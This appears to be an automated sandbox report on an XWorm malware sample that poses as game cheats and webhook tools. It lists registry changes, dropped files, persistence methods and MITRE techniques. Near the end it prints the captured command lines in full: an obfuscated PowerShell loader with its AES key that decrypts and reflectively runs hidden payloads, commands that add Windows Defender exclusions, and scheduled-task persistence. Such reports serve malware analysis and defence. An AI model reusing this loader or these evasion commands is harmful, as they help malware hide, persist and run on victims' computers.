xworm | 2d17ba79048d0a46969907a6120505f4608f9a252af3a5a21bb875c08aaee2ef

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WebhookSpammerV5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Latite_Client_betterV1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WebhookSpammerV1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	Latite Client_BetterV3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk	Latite Client_BetterV3.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsDefender.lnk	Latite Client_BetterV3.exe

Executes dropped EXE 15 IoCs

pid	Process
2412	Dice Roll Cheat.exe
4112	WebhookSpammerV5.exe
3888	Dice Roll Cheat.exe
4532	Latite_Client_betterV1.exe
5064	coolhi.exe
1656	coolhi.exe
4040	WebhookSpammerV1.exe
4348	Latite_Client_betterV1.exe
1296	Latite Client_BetterV3.exe
3632	Latite_Client_betterV1.exe
4368	WebhookSpammerV5.exe
3108	Latite_Client_betterV1.exe
2188	WebhookSpammerV5.exe
2280	Latite Client_BetterV3.exe
1444	WindowsDefender

Loads dropped DLL 32 IoCs

pid	Process
3888	Dice Roll Cheat.exe
3888	Dice Roll Cheat.exe
3888	Dice Roll Cheat.exe
3888	Dice Roll Cheat.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe
1656	coolhi.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefender = "C:\\ProgramData\\WindowsDefender"	Latite Client_BetterV3.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1296 set thread context of 664	1296	Latite Client_BetterV3.exe	193

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Latite_Client_betterV1.exe	WebhookSpammerV5.exe
File created	C:\Windows\coolhi.exe	WebhookSpammerV5.exe
File created	C:\Windows\Latite_Client_betterV1.exe	WebhookSpammerV1.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0009000000023400-70.dat	pyinstaller
behavioral1/files/0x00070000000234c4-198.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WebhookSpammerV1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies registry class 22 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1132	schtasks.exe
3484	schtasks.exe
3252	schtasks.exe
4120	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3068	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4580	powershell.exe
4580	powershell.exe
2120	powershell.exe
2120	powershell.exe
3768	powershell.exe
3768	powershell.exe
4864	powershell.exe
4864	powershell.exe
4864	powershell.exe
2724	powershell.exe
2724	powershell.exe
2724	powershell.exe
4464	powershell.exe
4464	powershell.exe
4464	powershell.exe
2692	powershell.exe
2692	powershell.exe
4372	powershell.exe
4372	powershell.exe
2692	powershell.exe
4372	powershell.exe
4536	powershell.exe
4536	powershell.exe
4804	powershell.exe
4804	powershell.exe
4804	powershell.exe
4536	powershell.exe
4456	powershell.exe
4456	powershell.exe
4456	powershell.exe
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
3972	powershell.exe
3972	powershell.exe
3972	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
4912	powershell.exe
4912	powershell.exe
664	powershell.exe
664	powershell.exe
1428	powershell.exe
1428	powershell.exe
4912	powershell.exe
664	powershell.exe
1428	powershell.exe
4992	powershell.exe
4992	powershell.exe
2280	powershell.exe
2280	powershell.exe
2280	powershell.exe
4992	powershell.exe
4776	powershell.exe
4776	powershell.exe
4776	powershell.exe
3064	powershell.exe
3064	powershell.exe
3064	powershell.exe
3204	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeIncreaseQuotaPrivilege	2120	powershell.exe
Token: SeSecurityPrivilege	2120	powershell.exe
Token: SeTakeOwnershipPrivilege	2120	powershell.exe
Token: SeLoadDriverPrivilege	2120	powershell.exe
Token: SeSystemProfilePrivilege	2120	powershell.exe
Token: SeSystemtimePrivilege	2120	powershell.exe
Token: SeProfSingleProcessPrivilege	2120	powershell.exe
Token: SeIncBasePriorityPrivilege	2120	powershell.exe
Token: SeCreatePagefilePrivilege	2120	powershell.exe
Token: SeBackupPrivilege	2120	powershell.exe
Token: SeRestorePrivilege	2120	powershell.exe
Token: SeShutdownPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeSystemEnvironmentPrivilege	2120	powershell.exe
Token: SeRemoteShutdownPrivilege	2120	powershell.exe
Token: SeUndockPrivilege	2120	powershell.exe
Token: SeManageVolumePrivilege	2120	powershell.exe
Token: 33	2120	powershell.exe
Token: 34	2120	powershell.exe
Token: 35	2120	powershell.exe
Token: 36	2120	powershell.exe
Token: SeIncreaseQuotaPrivilege	2120	powershell.exe
Token: SeSecurityPrivilege	2120	powershell.exe
Token: SeTakeOwnershipPrivilege	2120	powershell.exe
Token: SeLoadDriverPrivilege	2120	powershell.exe
Token: SeSystemProfilePrivilege	2120	powershell.exe
Token: SeSystemtimePrivilege	2120	powershell.exe
Token: SeProfSingleProcessPrivilege	2120	powershell.exe
Token: SeIncBasePriorityPrivilege	2120	powershell.exe
Token: SeCreatePagefilePrivilege	2120	powershell.exe
Token: SeBackupPrivilege	2120	powershell.exe
Token: SeRestorePrivilege	2120	powershell.exe
Token: SeShutdownPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeSystemEnvironmentPrivilege	2120	powershell.exe
Token: SeRemoteShutdownPrivilege	2120	powershell.exe
Token: SeUndockPrivilege	2120	powershell.exe
Token: SeManageVolumePrivilege	2120	powershell.exe
Token: 33	2120	powershell.exe
Token: 34	2120	powershell.exe
Token: 35	2120	powershell.exe
Token: 36	2120	powershell.exe
Token: SeIncreaseQuotaPrivilege	2120	powershell.exe
Token: SeSecurityPrivilege	2120	powershell.exe
Token: SeTakeOwnershipPrivilege	2120	powershell.exe
Token: SeLoadDriverPrivilege	2120	powershell.exe
Token: SeSystemProfilePrivilege	2120	powershell.exe
Token: SeSystemtimePrivilege	2120	powershell.exe
Token: SeProfSingleProcessPrivilege	2120	powershell.exe
Token: SeIncBasePriorityPrivilege	2120	powershell.exe
Token: SeCreatePagefilePrivilege	2120	powershell.exe
Token: SeBackupPrivilege	2120	powershell.exe
Token: SeRestorePrivilege	2120	powershell.exe
Token: SeShutdownPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeSystemEnvironmentPrivilege	2120	powershell.exe
Token: SeRemoteShutdownPrivilege	2120	powershell.exe
Token: SeUndockPrivilege	2120	powershell.exe
Token: SeManageVolumePrivilege	2120	powershell.exe
Token: 33	2120	powershell.exe
Token: 34	2120	powershell.exe
Token: 35	2120	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1296	Latite Client_BetterV3.exe
3068	explorer.exe
3068	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2268 wrote to memory of 2688	2268	cmd.exe	86
PID 2268 wrote to memory of 2688	2268	cmd.exe	86
PID 2688 wrote to memory of 4140	2688	net.exe	87
PID 2688 wrote to memory of 4140	2688	net.exe	87
PID 2268 wrote to memory of 4580	2268	cmd.exe	91
PID 2268 wrote to memory of 4580	2268	cmd.exe	91
PID 4580 wrote to memory of 2120	4580	powershell.exe	100
PID 4580 wrote to memory of 2120	4580	powershell.exe	100
PID 4580 wrote to memory of 1548	4580	powershell.exe	102
PID 4580 wrote to memory of 1548	4580	powershell.exe	102
PID 1548 wrote to memory of 4964	1548	WScript.exe	103
PID 1548 wrote to memory of 4964	1548	WScript.exe	103
PID 4964 wrote to memory of 3776	4964	cmd.exe	105
PID 4964 wrote to memory of 3776	4964	cmd.exe	105
PID 3776 wrote to memory of 4904	3776	net.exe	106
PID 3776 wrote to memory of 4904	3776	net.exe	106
PID 4964 wrote to memory of 3768	4964	cmd.exe	107
PID 4964 wrote to memory of 3768	4964	cmd.exe	107
PID 3768 wrote to memory of 2412	3768	powershell.exe	110
PID 3768 wrote to memory of 2412	3768	powershell.exe	110
PID 3768 wrote to memory of 4112	3768	powershell.exe	111
PID 3768 wrote to memory of 4112	3768	powershell.exe	111
PID 3768 wrote to memory of 2092	3768	powershell.exe	113
PID 3768 wrote to memory of 2092	3768	powershell.exe	113
PID 2092 wrote to memory of 3708	2092	cmd.exe	115
PID 2092 wrote to memory of 3708	2092	cmd.exe	115
PID 3708 wrote to memory of 3464	3708	net.exe	116
PID 3708 wrote to memory of 3464	3708	net.exe	116
PID 2092 wrote to memory of 4864	2092	cmd.exe	117
PID 2092 wrote to memory of 4864	2092	cmd.exe	117
PID 2412 wrote to memory of 3888	2412	Dice Roll Cheat.exe	118
PID 2412 wrote to memory of 3888	2412	Dice Roll Cheat.exe	118
PID 4112 wrote to memory of 2724	4112	WebhookSpammerV5.exe	119
PID 4112 wrote to memory of 2724	4112	WebhookSpammerV5.exe	119
PID 4112 wrote to memory of 4464	4112	WebhookSpammerV5.exe	154
PID 4112 wrote to memory of 4464	4112	WebhookSpammerV5.exe	154
PID 4864 wrote to memory of 2692	4864	powershell.exe	123
PID 4864 wrote to memory of 2692	4864	powershell.exe	123
PID 4112 wrote to memory of 4372	4112	WebhookSpammerV5.exe	152
PID 4112 wrote to memory of 4372	4112	WebhookSpammerV5.exe	152
PID 4112 wrote to memory of 1132	4112	WebhookSpammerV5.exe	127
PID 4112 wrote to memory of 1132	4112	WebhookSpammerV5.exe	127
PID 4864 wrote to memory of 1888	4864	powershell.exe	129
PID 4864 wrote to memory of 1888	4864	powershell.exe	129
PID 4112 wrote to memory of 4536	4112	WebhookSpammerV5.exe	130
PID 4112 wrote to memory of 4536	4112	WebhookSpammerV5.exe	130
PID 4112 wrote to memory of 4804	4112	WebhookSpammerV5.exe	132
PID 4112 wrote to memory of 4804	4112	WebhookSpammerV5.exe	132
PID 4112 wrote to memory of 4532	4112	WebhookSpammerV5.exe	134
PID 4112 wrote to memory of 4532	4112	WebhookSpammerV5.exe	134
PID 4112 wrote to memory of 5064	4112	WebhookSpammerV5.exe	135
PID 4112 wrote to memory of 5064	4112	WebhookSpammerV5.exe	135
PID 1888 wrote to memory of 4604	1888	WScript.exe	137
PID 1888 wrote to memory of 4604	1888	WScript.exe	137
PID 5064 wrote to memory of 1656	5064	coolhi.exe	161
PID 5064 wrote to memory of 1656	5064	coolhi.exe	161
PID 4604 wrote to memory of 668	4604	cmd.exe	140
PID 4604 wrote to memory of 668	4604	cmd.exe	140
PID 668 wrote to memory of 2280	668	net.exe	164
PID 668 wrote to memory of 2280	668	net.exe	164
PID 4604 wrote to memory of 4456	4604	cmd.exe	142
PID 4604 wrote to memory of 4456	4604	cmd.exe	142
PID 1656 wrote to memory of 1536	1656	coolhi.exe	143
PID 1656 wrote to memory of 1536	1656	coolhi.exe	143

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:4140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Image logger V2.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_430_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_430.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_430.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_430.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4964
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3776
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4904
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pVRq/D+FVfd8+LmCT+JTD5FkmVpVj58PwMuuwejp7A8='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7gZnoVPeTaG83gJkOBv7Nw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UcjVM=New-Object System.IO.MemoryStream(,$param_var); $xpURH=New-Object System.IO.MemoryStream; $nDXcd=New-Object System.IO.Compression.GZipStream($UcjVM, [IO.Compression.CompressionMode]::Decompress); $nDXcd.CopyTo($xpURH); $nDXcd.Dispose(); $UcjVM.Dispose(); $xpURH.Dispose(); $xpURH.ToArray();}function execute_function($param_var,$param2_var){ $DODmL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KFoJM=$DODmL.EntryPoint; $KFoJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_430.bat';$ADUfX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_430.bat').Split([Environment]::NewLine);foreach ($fGOOP in $ADUfX) { if ($fGOOP.StartsWith(':: ')) { $bUqWZ=$fGOOP.Substring(3); break; }}$payloads_var=[string[]]$bUqWZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3768
      - C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Dice Roll Cheat.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3888
      - C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of WriteProcessMemory
        
        PID:4112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WebhookSpammerV5.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV5.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WebhookSpammerV5.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4372
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "WebhookSpammerV5" /tr "C:\ProgramData\WebhookSpammerV5.exe"
        7⤵
